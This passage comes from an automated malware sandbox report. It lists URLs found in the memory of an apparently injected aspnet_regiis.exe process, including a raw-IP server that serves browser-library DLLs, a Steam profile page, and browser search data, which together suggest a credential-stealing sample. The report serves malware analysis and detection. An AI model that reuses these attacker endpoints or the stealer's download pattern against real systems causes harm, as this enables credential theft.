                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: file.exeString found in binary or memory: http://ocsp.sectigo.com0
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382857072.000000002204D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://49.12.197.9
                          Source: aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2518356276.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/
                          Source: aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/$
                          Source: aspnet_regiis.exe, 00000003.00000003.2650340672.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/-end-point:f
                          Source: aspnet_regiis.exe, 00000003.00000003.2650340672.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/5
                          Source: aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/;
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/A
                          Source: aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/CAAFHIEBKJ
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/N
                          Source: aspnet_regiis.exe, 00000003.00000003.2517610034.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2518356276.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/S
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/W
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/b
                          Source: aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll6
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531063121.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531200082.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531268467.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/g
                          Source: aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll.9#
                          Source: aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dllhy=
                          Source: aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dllll
                          Source: aspnet_regiis.exe, 00000003.00000003.2517610034.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2518356276.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/o
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531063121.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531200082.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531268467.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/ta_
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/y
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9FHIEHDGI--
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9HIEBAK
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9IEHDGI
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
